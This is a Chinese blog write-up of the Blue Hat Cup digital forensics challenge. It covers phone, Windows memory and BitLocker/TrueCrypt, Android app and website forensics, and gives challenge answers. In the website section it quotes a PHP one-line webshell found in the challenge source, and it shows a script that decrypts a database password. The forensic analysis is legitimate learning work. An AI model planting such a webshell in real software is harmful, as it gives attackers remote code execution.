蓝帽杯_电子取证
Charmersix
  2022-07-10 00:00:00 2022-07-10 00:00   2023-04-09 16:31:18   961 Words  3 Mins  

第一次做这么多取证题,也是学到了很多东西

手机取证

手机取证_1

​ 现对一个苹果手机进行取证,请您对以下问题进行分析解答。

​ 627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?(答案参考格式:1920x1080)

​ 附件下载地址见平台公告,解压密码为0ba6b2c094cbb3a04681a135487a19cb

盘古阅读器打开,搜索一下题目中的图片,得到

我们保存下来,看一下属性

得到分辨率

手机取证_2

还是上题做法,我们搜一下单号

计算机取证

计算机取证_1

现对一个windows计算机进行取证,请您对以下问题进行分析解答。

从内存镜像中获得taqi7的开机密码是多少?(答案参考格式:abcABC123)

附件下载地址见平台公告,解压密码为93ce7ea39bdd7baa137f1e9b963b7ee5

内存取证,来到强大的vol

详情见截图

得到后,我们进行MD5解密

计算机取证_2

制作该内存镜像的进程Pid号是多少?(答案参考格式:1024)

这次我们打开火眼

然后找到进程

计算机取证_3

bitlokcer分区某office文件中存在的flag值为?(答案参考格式:flag{abcABC123})

来到取证大师,用小工具解析出密钥

https://s1.ax1x.com/2022/07/09/jrkIQx.png

然后保存下来

解开,得到两个office文件,全部导出

再次套娃一层

我们还能发现pass.txt,打开是个字典,正好可以爆破

计算机取证_4

TrueCrypt加密中存在的flag值为?(答案参考格式:flag{abcABC123})

再回到vol

万物皆可binwalk

拿到了一坨压缩包,大致翻了翻,只有一个带密码的,好像有些东西

好像损坏了,由于手头只有修zip的工具,生改后缀,成功,爆破

flag:flag{1349934913913991394cacacacacacc}

app取证

程序分析_1

现已获取某个APP程序,请您对以下问题进行分析解答。

本程序包名是?(答案参考格式:abc.xx.de)

附件下载 提取码(GAME)备用下载

打开我们的雷电工具,显而易见

程序分析_2

本程序的入口是?(答案参考格式:abc.xx.de)

继续看

得到minmtta.hemjcbm.ahibyws.MainActivity

程序分析_3

本程序的服务器地址的密文是?(答案参考格式:abcABC123)

反编译一下,拿到源码

aHR0cHM6Ly9hbnNqay5lY3hlaW8ueHl6

程序分析_4

本程序实现安全检测的类的名称是?(答案参考格式:abcABC123)

继续顺一下我们的源码,安全检测,发现了相关源码

网站取证

网站取证_1

据了解,某网上商城系一团伙日常资金往来用,从2022年4月1日起使用虚拟币GG币进行交易,现已获得该网站的源代码以及部分数据库备份文件,请您对以下问题进行分析解答。

请从网站源码中找出木马文件,并提交木马连接的密码。(答案参考格式:abcABC123)

附件下载 提取码(GAME)备用下载

下载附件,看一下,全是源码,咱们vsc打开翻一翻

然后挨着翻也就翻到了一句话木马

<?php assert(@$_POST['lanmaobei666']); ?>

网站取证_2

请提交数据库连接的明文密码。(答案参考格式:abcABC123)

passwd指到了my_encrypt()

根据源码得到解码脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
function my_encrypt(){
    $str = 'P3LMJ4uCbkFJ/RarywrCvA==';
    $str = str_replace(array("/r/n", "/r", "/n"), "", $str);
    $key = 'PanGuShi';
    $iv = substr(sha1($key),0,16);
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,"",MCRYPT_MODE_CBC,"");
    mcrypt_generic_init($td, "PanGuShi", $iv);
    $decode = base64_decode($str);
    $dencrypted = mdecrypt_generic($td, $decode);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    $dencrypted = trim($dencrypted);
    return $dencrypted;
}
echo my_encrypt();
?>

结果KBLT123

网站取证_3

请提交数据库金额加密混淆使用的盐值。(答案参考格式:abcABC123)

还是翻源码,得到

function decrypt($data, $key = 'jyzg123456')

  • Post title: 蓝帽杯_电子取证
  • Post author: Charmersix
  • Create time: 2022-07-10 00:00:00
  • Post link: 2022/07/10/blue_hat/
  • Copyright notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.
 Comments
  1. 1. 手机取证
    1. 1.1. 手机取证_1
    2. 1.2. 手机取证_2
  2. 2. 计算机取证
    1. 2.1. 计算机取证_1
    2. 2.2. 计算机取证_2
    3. 2.3. 计算机取证_3
    4. 2.4. 计算机取证_4
  3. 3. app取证
    1. 3.1. 程序分析_1
    2. 3.2. 程序分析_2
    3. 3.3. 程序分析_3
    4. 3.4. 程序分析_4
  4. 4. 网站取证
    1. 4.1. 网站取证_1
    2. 4.2. 网站取证_2
    3. 4.3. 网站取证_3